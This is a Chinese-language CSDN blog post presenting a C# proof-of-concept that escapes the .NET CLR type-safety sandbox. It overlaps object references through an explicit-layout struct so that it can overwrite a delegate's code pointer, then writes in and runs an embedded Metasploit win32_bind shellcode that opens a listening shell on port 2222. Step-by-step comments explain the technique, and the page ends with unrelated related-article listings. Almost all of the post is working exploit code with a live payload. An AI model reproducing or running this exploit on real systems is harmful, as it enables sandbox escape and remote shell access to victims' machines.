.net exploit poc 笔记

最新推荐文章于 2024-06-24 12:14:48 发布
最新推荐文章于 2024-06-24 12:14:48 发布
阅读量1.1k 收藏
点赞数
分类专栏: 公开发布 文章标签: .net c byte x86 object string
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cnqing/article/details/2955880
版权
  1. using System;
  2. using System.IO;
  3. using System.Threading;
  4. using System.Text;
  5. using System.Runtime.InteropServices;
  8. class Union1
  9. {
  10.     public volatile int i = 0; //volatile 修饰为引用类型  这里不管有无修饰符与否都是值类型 长度=4
  11.     public int j;//长度=4
  12. }
  14. class Union2
  15. {
  16.     public  object o; //均为引用类型 (指针) 长度=4
  17.     public  int[] arr = null;// 长度=4
  18. }
  20. /// <summary>
  21. /// based on yunshu's 《使用安全的C#代码跳出CLR沙箱》
  22. /// 原理:
  23. /// 1.初始化一个方法 和一个数组
  24. /// 2.将方法的内存地址 和数组的内存地址 转换成int,使得修改int就可以改变方法和数组的内存地址
  25. /// 3.修改数组的的保存地址落到方法的代码段地址中
  26. /// 4.修改数组内容,达到修改方法的效果。
  27. /// </summary>
  28. class TypeSafetyExploitPoC
  29. {
  30.     [StructLayout(LayoutKind.Explicit)] //精确布局每个成员, Sequential 为顺序布局
  31.     struct UnsafeUnion
  32.     {
  33.         [FieldOffset(0)]//内存偏移0
  34.         internal Union1 u1;
  35.         [FieldOffset(0)]//内存偏移0 
  36.         internal Union2 u2;
  37.         //两个成员内存偏移都是0 且长度相同 导致内存重合
  38.     }
  39.     
  40.     static void DummyMethod()
  41.     {
  42.        //方法入口
  43.     }
  45.     internal static void Main(string[] args)
  46.     {
  47.         Union1 u1;
  48.         Union2 u2 = new Union2();//初始化 u2  存放了两个指针(object,array),每个4byte 
  50.         UnsafeUnion uu = new UnsafeUnion(); //在内存中精确布局结构
  51.         uu.u2 = u2;//赋值uu 的u2成员,由于uu.u1成员和uu.u2成员内存重合,uu.u1已经不为空
  52.         u1 = uu.u1;//赋值u1 u1的两个元素为 i,j ,此时就把u2的两个元素指针用u1.i 和u1.j 读出。
  54.         ThreadStart del = new ThreadStart(DummyMethod);//初始化一个方法入口
  55.         u2.o = del;//获取方法入口地址, 此时u1.i值就是 del方法的地址
  56.         u1.j = u1.i;//将u2.arr 指向del方法
  57.         u1.j = u2.arr[2]-12 ;//修改u2.arr的保存位置(指针),到指向方法的入口。也就是修改“方法”的代码段。
  59.         /* 方法在内存的结构 如果用array来读 没4byte 为一个元素 所以arr[2] 就是要找的   _methodPtrAux   
  60.                  790fd0f0  40000ff        4        System.Object  0 instance 021a1744 _target       --->调用源
  61.                  7910ebc8  4000100        8 ...ection.MethodBase  0 instance 021a18fc _methodBase   --->array[0]
  62.                  791016bc  4000101        c        System.IntPtr  1 instance 007C09FC _methodPtr    --->array[1]
  63.                  791016bc  4000102       10        System.IntPtr  1 instance 0029C040 _methodPtrAux --->array[2] 要把shellcode放到这前面
  64.        */
  66.         #region 修改数组内容--》修改方法的内容
  67.         MemoryStream mem = new MemoryStream();
  68.         BinaryWriter bw = new BinaryWriter(mem);
  69.         BinaryReader reader = new BinaryReader(mem);
  70.         try
  71.         {
  72.             // win32_bind -  EXITFUNC=thread LPORT=2222 Size=344 Encoder=PexFnstenvSub http://metasploit.com
  73.             byte[] shellcode = { 0x29, 0xc9, 0x83, 0xe9, 0xb0, 0xd9, 0xee, 0xd9, 0x74, 0x24, 0xf4, 0x5b, 0x81, 0x73, 0x13, 0x0e, 0x4b, 0x46, 0x7e, 0x83, 0xeb, 0xfc, 0xe2, 0xf4, 0xf2, 0x21, 0xad, 0x33, 0xe6, 0xb2, 0xb9, 0x81, 0xf1, 0x2b, 0xcd, 0x12, 0x2a, 0x6f, 0xcd, 0x3b, 0x32, 0xc0, 0x3a, 0x7b, 0x76, 0x4a, 0xa9, 0xf5, 0x41, 0x53, 0xcd, 0x21, 0x2e, 0x4a, 0xad, 0x37, 0x85, 0x7f, 0xcd, 0x7f, 0xe0, 0x7a, 0x86, 0xe7, 0xa2, 0xcf, 0x86, 0x0a, 0x09, 0x8a, 0x8c, 0x73, 0x0f, 0x89, 0xad, 0x8a, 0x35, 0x1f, 0x62, 0x56, 0x7b, 0xae, 0xcd, 0x21, 0x2a, 0x4a, 0xad, 0x18, 0x85, 0x47, 0x0d, 0xf5, 0x51, 0x57, 0x47, 0x95, 0x0d, 0x67, 0xcd, 0xf7, 0x62, 0x6f, 0x5a, 0x1f, 0xcd, 0x7a, 0x9d, 0x1a, 0x85, 0x08, 0x76, 0xf5, 0x4e, 0x47, 0xcd, 0x0e, 0x12, 0xe6, 0xcd, 0x3e, 0x06, 0x15, 0x2e, 0xf0, 0x40, 0x45, 0xaa, 0x2e, 0xf1, 0x9d, 0x20, 0x2d, 0x68, 0x23, 0x75, 0x4c, 0x66, 0x3c, 0x35, 0x4c, 0x51, 0x1f, 0xb9, 0xae, 0x66, 0x80, 0xab, 0x82, 0x35, 0x1b, 0xb9, 0xa8, 0x51, 0xc2, 0xa3, 0x18, 0x8f, 0xa6, 0x4e, 0x7c, 0x5b, 0x21, 0x44, 0x81, 0xde, 0x23, 0x9f, 0x77, 0xfb, 0xe6, 0x11, 0x81, 0xd8, 0x18, 0x15, 0x2d, 0x5d, 0x18, 0x05, 0x2d, 0x4d, 0x18, 0xb9, 0xae, 0x68, 0x23, 0x4e, 0xd0, 0x68, 0x18, 0xcf, 0x9f, 0x9b, 0x23, 0xe2, 0x64, 0x7e, 0x8c, 0x11, 0x81, 0xd8, 0x21, 0x56, 0x2f, 0x5b, 0xb4, 0x96, 0x16, 0xaa, 0xe6, 0x68, 0x97, 0x59, 0xb4, 0x90, 0x2d, 0x5b, 0xb4, 0x96, 0x16, 0xeb, 0x02, 0xc0, 0x37, 0x59, 0xb4, 0x90, 0x2e, 0x5a, 0x1f, 0x13, 0x81, 0xde, 0xd8, 0x2e, 0x99, 0x77, 0x8d, 0x3f, 0x29, 0xf1, 0x9d, 0x13, 0x81, 0xde, 0x2d, 0x2c, 0x1a, 0x68, 0x23, 0x25, 0x13, 0x87, 0xae, 0x2c, 0x2e, 0x57, 0x62, 0x8a, 0xf7, 0xe9, 0x21, 0x02, 0xf7, 0xec, 0x7a, 0x86, 0x8d, 0xa4, 0xb5, 0x04, 0x53, 0xf0, 0x09, 0x6a, 0xed, 0x83, 0x31, 0x7e, 0xd5, 0xa5, 0xe0, 0x2e, 0x0c, 0xf0, 0xf8, 0x50, 0x81, 0x7b, 0x0f, 0xb9, 0xa8, 0x55, 0x1c, 0x14, 0x2f, 0x5f, 0x1a, 0x2c, 0x7f, 0x5f, 0x1a, 0x13, 0x2f, 0xf1, 0x9b, 0x2e, 0xd3, 0xd7, 0x4e, 0x88, 0x2d, 0xf1, 0x9d, 0x2c, 0x81, 0xf1, 0x7c, 0xb9, 0xae, 0x85, 0x1c, 0xba, 0xfd, 0xca, 0x2f, 0xb9, 0xa8, 0x5c, 0xb4, 0x96, 0x16, 0xe1, 0x85, 0xa6, 0x1e, 0x5d, 0xb4, 0x90, 0x81, 0xde, 0x4b, 0x46, 0x7e };
  74.             bw.Write(shellcode, 0, shellcode.Length);
  75.         }
  77.         catch (Exception e)
  78.         {
  79.             Console.WriteLine("Write error." + e.Message);
  80.         }
  81.         try
  82.         {
  83.             byte[] tmp = mem.ToArray();
  84.             for (int i = 0; i < tmp.Length / 4; i++)
  85.             {
  86.                 u2.arr[1 + i] = BitConverter.ToInt32(tmp, i * 4);
  87.             }
  88.             del();
  89.         }
  91.         catch
  92.         {
  94.         }
  95.     #endregion
  96.     }
  97. }
cnqing
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
netforce exploit
陈文青
01-06 1162
很久没有上netforce了,当年做了几道javascript的题就撂下了.现在寻思着拿起来,但实在是被js恶心到了,于是跳过了上面的很多东西,直接到了下面的exploit部分.二话不说开战吧 Training - Nice include system 从标题到url,无不透着一股提示的味道. 瞄一眼url,就能看出这个网页的后台语言是php.include无疑
2020小迪安全第十天笔记-(信息收集)资产监控拓展
weixin_51566416的博客
12-08 5209
笔记来源视频: 【小迪安全】web安全|渗透测试|网络安全(6个月线上培训全套)_哔哩哔哩_bilibili​​​​​​ 信息收集-资产监控拓展 目录 信息收集-资产监控拓展 #Github 监控 便于收集整理最新 exp或 poc 便于发现相关测试目标的资产 #各种子域名查询 #DNS,备案,证书 #全球节点请求 cdn #黑暗引擎相关搜索 #微信公众号接口获取 #内部群内部应用内部接(社会工程学) ·黑暗引擎(如fofa.so)实现域名接口等收集 ·全自动域名收集枚...
How to Using exploits.
Gabriel的专栏
04-08 818
国外的资料,英文不好的话自己查下字典 By RoMeO  I will discuss ways to handle and compile exploits. Alot of exploits come with "noob protection". Noob protection being they will move or add sections of text or
app,waf笔记
qq_45981247的博客
06-06 923
小迪安全v2023笔记 基础入门
最新发布
google20的博客
06-24 906
小迪安全2023笔记
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5453
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 7937
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
【Linux_Kali网络渗透测试学习笔记总结(六)】漏洞利用
数据库爆破专家的博客
04-30 4037
网络渗透测试(六):漏洞利用 编写漏洞利用程序(exploit) 的程序代码都不仅费时费力,而且代码的质量直接关系找整个工作环节的成败。因此,渗透人员需要根据目标环境的实际情况对通过公开渠道获取的exploit程序进行相应调整。这种调整工作的技术含量很高,而且这类工作通常都是触类旁通的。掌握相应技能的人员可以举一反三地对很多程序进行调整。强烈建议读者在编写自己的漏洞利用程序之前,先通过公开渠道获取...
kaliWEB渗透笔记
fhl5203的博客
11-01 5164
抓包协议分析 一般每300M分成一个包,这样抓包分析工具打开速度不会太慢。 首先剔除对分析没有用处的协议,剔除IP地址是224以上的组播地址。 WEB攻击面 Network、OS、WEB Server、App server、Web Application、Database、Browser 重要的header • Set-Cookie:服务器发给客户端的SessionlD (被窃取的风险) • Co...
Msn15 协议分析
guagua
01-15 7722
发布时间:2007年7月PS:应该把这个小工具发布出来MSN协议分析21:56:  VER 77 MSNP15 MSNP14 MSNP13 CVR0  //-->协商MSN版本请求 21:56:  VER 77 MSNP15 MSNP14 MSNP13 CVR0  //协商MSN版本请求 21:56:  CVR 78 0x0804 winnt 6.0 i386 MS
skiller3.31 发布
guagua
06-12 3351
下载地址: http://www.cncert.net/up_files/soft/skiller331.rar软件说明:可突破任意ARP防火墙,以限制流量为目标的简单网络管理软件。使用方法:1.在参数设置中选择好工作网卡;2.检查网关信息和本机信息是否正确,如果不正确,请手动输入,无需保存;3.点击流量探测或手动添加或自动扫描以填充目标列表;4.设置一个代理,最好
SkillerV2 beta2
guagua
03-09 2846
SkillerV2 beta2 2008-03-09软件说明:可过ARP防火墙,控制P2P的免费网络管理软件。v2beta2 更新说明:增加被动探测功能v2beta1 更新说明:增加流量探测功能使用说明:1.点击流量探测或手动添加或自动扫描以填充目标列表2.选择要限制网速的主机3.开始控制特别注明:集成了无ARP欺骗的上行,下行,劫持。过任意ARP防火墙,流量探测为抽样探测模式
Skiller V3
guagua
04-14 2771
软件说明:可突破任意ARP防火墙,以限制流量为目标的简单网络管理软件。使用方法:    1.在参数设置中选择好工作网卡;    2.检查网关信息和本机信息是否正确,如果不正确,请手动输入,无需保存;    3.点击流量探测或手动添加或自动扫描以填充目标列表;    4.设置一个代理,最好不同于目标,代理设置后,只有代理主机会收到伪流量;    5.选择要限制网速的主机;    6.开始控制。
SSClone 1.0 (最初无限制版)公开发布
guagua
06-11 2626
SSClone 1.0 (最初无限制版)公开发布写在前面的虽然有点旧距今14个月,但尚未发行过,无限制版本。抱歉Splash有个单词写错了,由于已经没有代码了,懒得去改。相对于最新版 体积小,运行快,BUG多,隐蔽性低。完全功能的ssclone1.0开发完成日期2007年4月公开发布日期2008年6月 最新版本1.305软件说明:
“鬼页” 继续
guagua
07-20 2048
为了不落后,也学习下鬼页。先看下POChttp://sirdarckcat.blogspot.com/2008/05/ghosts-for-ie8-and-ie75730.html代码:javascript:x=open(http://hackademix.net/);setInterval(function(){try{x.frames[0].location={toString:funct
skiller v3 beta2 发布
guagua
06-06 1968
^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ ^_^ 软件说明:可突破任意ARP防火墙,以限制流量为目标的简单网络管理软件。使用方法:    1.在参数设置中选择好工作网卡;    2.检查网关信息和本机信息是否正确,如果不正确,请手动输入,无需保存;    3.点击流量探测或手动添加或自动扫描以填充目标列表;    4.设
200mW 绿光
guagua
04-19 1559
败了把家,200mW 绿光 果然不含糊。可惜放在北京了,亲爱的东吧啦 ,快给寄过来吧。。。 
Switch Session Clone 1210
guagua
03-03 1473
    Switch Session Clone 首款基于mac+port理论的hack工具。交换环境下无arp欺骗的会话复制软件利用mac+port欺骗方式实现sniffer.通过过滤(url)中的cookie信息复制出相同的会话.适用于任何http协议.比 "黑帽"聚会中的hamster功能更加强大。可以成功的穿过各种反arp工具。经过实验,可以成功突破antiar
基于栈溢出的Exploit编写入门教程
作者提到,初始的PoC代码可能在某些环境中无法成功利用,这引发了对exploit开发过程的兴趣。 作者强调,理解exploit编写并非易事,特别是对于那些不具备快速反汇编和解读shellcode能力的人来说。他们提出,exploit...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值